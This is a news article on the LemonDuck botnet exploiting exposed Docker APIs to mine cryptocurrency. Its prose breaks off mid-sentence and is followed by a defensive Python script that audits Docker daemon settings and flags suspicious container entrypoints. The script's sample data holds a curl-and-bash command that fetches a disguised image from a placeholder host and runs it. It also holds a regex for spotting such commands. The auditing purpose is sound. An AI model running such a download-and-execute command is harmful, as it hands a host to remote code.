LemonDuck cryptomining botnet previously targeted Microsoft Exchange servers. Now it is targeting the world’s leading containerization platform, Docker.
According to the latest research from cybersecurity experts at CrowdStrike, the infamous LemonDuck crypto mining botnet targets the Docker platform on Linux systems to mine for cryptocurrency.
In this currently active campaign, the botnet is taking extensive new measures to avoid detection, such as leveraging proxy pools to hide its wallet addresses and attempting to disable the Alibaba Cloud monitoring service.
The Docker platform is used for running containers in the cloud. According to CrowdStrike researchers, the LemonDuck botnet exploits misconfigured Docker deployments that expose the Docker API, which lets it deploy exploit kits and malware.
In his analysis, Manoj Ahuje with CrowdStrike stated that cloud and container ecosystems heavily rely on Linux, which draws the attention of botnet operators such as LemonDuck, targeting Docker.
Details of the Attack
LemonDuck targets the Docker platform by running a malicious container on the exposed Docker API through a custom Docker ENTRYPOINT instruction. The entrypoint configures how the container runs and is used to download an image file that is actually a disguised Bash script. It then sets up a Linux cronjob
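The two conditions described above, a Docker API reachable over TCP without client authentication and a container whose entrypoint fetches a remote file and hands it to a shell, can both be checked from the defender's side with a few lines of Python. The script below is an added example for this article, not code from CrowdStrike or from the Docker project; it reads the real `daemon.json` keys (`hosts`, `tls`, `tlsverify`) and the `Config.Entrypoint` / `Config.Cmd` fields of `docker inspect` output, but the sample records it runs on are constructed, and the 203.0.113.10 address is a documentation-range placeholder rather than an indicator from the campaign.

```python
"""Audit helpers for an exposed Docker API and download-and-execute entrypoints.

Added illustration for the article above; not CrowdStrike's or Docker's code.
The sample daemon configs and container records below are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import urlparse

# Shell fragments that pull a remote file and hand it to an interpreter:
#   curl ... | bash      wget -O x ... && bash x      curl ... ; sh x
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget)\b.*(\|\s*|&&\s*|;\s*)(ba)?sh\b"
)


def audit_daemon_config(cfg: dict) -> list[str]:
    """Return findings for a parsed /etc/docker/daemon.json dictionary.

    A tcp:// entry in 'hosts' without both 'tls' and 'tlsverify' means any
    client that can reach the port can create containers on the host.
    """
    findings: list[str] = []
    tls_ok = bool(cfg.get("tls")) and bool(cfg.get("tlsverify"))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local-only
        bind = urlparse(host).hostname or ""
        if not tls_ok:
            findings.append(f"{host}: API on TCP without TLS client verification")
        if bind in ("", "0.0.0.0", "::"):
            findings.append(f"{host}: bound to all interfaces")
    return findings


def _flatten(argv) -> str:
    """Entrypoint/Cmd may be null, a string, or a list of strings."""
    if argv is None:
        return ""
    return argv if isinstance(argv, str) else " ".join(argv)


def flag_containers(inspect_records: list[dict]) -> list[dict]:
    """Walk `docker inspect` style records; flag entrypoints that download and run code."""
    hits: list[dict] = []
    for rec in inspect_records:
        config = rec.get("Config", {})
        cmdline = (_flatten(config.get("Entrypoint")) + " " + _flatten(config.get("Cmd"))).strip()
        if DOWNLOAD_EXEC.search(cmdline):
            hits.append({"id": rec.get("Id", "")[:12], "name": rec.get("Name", ""), "cmdline": cmdline})
    return hits


# --- constructed sample input -------------------------------------------------
EXPOSED_DAEMON_CFG = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON_CFG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tls": True, "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}
SAMPLE_CONTAINERS = [
    {"Id": "3f1a9c0b7d2e4f5a6b7c", "Name": "/web",
     "Config": {"Entrypoint": ["/docker-entrypoint.sh"], "Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Id": "9e8d7c6b5a4f3e2d1c0b", "Name": "/quirky_hopper",
     # constructed: a custom entrypoint that fetches a ".png" and runs it as a script
     "Config": {"Entrypoint": ["/bin/sh", "-c",
                               "curl -fsSL http://203.0.113.10/a.png -o /tmp/a.png && bash /tmp/a.png"],
                "Cmd": None}},
]

if __name__ == "__main__":
    for label, cfg in (("exposed", EXPOSED_DAEMON_CFG), ("hardened", HARDENED_DAEMON_CFG)):
        print(label, audit_daemon_config(cfg) or "no findings")
    for hit in flag_containers(SAMPLE_CONTAINERS):
        print("suspicious container", hit)
```

On a live host, feed `audit_daemon_config` the parsed contents of `/etc/docker/daemon.json` and `flag_containers` the JSON array printed by `docker inspect $(docker ps -aq)`; the entrypoint regex is a coarse heuristic, so treat its hits as leads to inspect rather than verdicts.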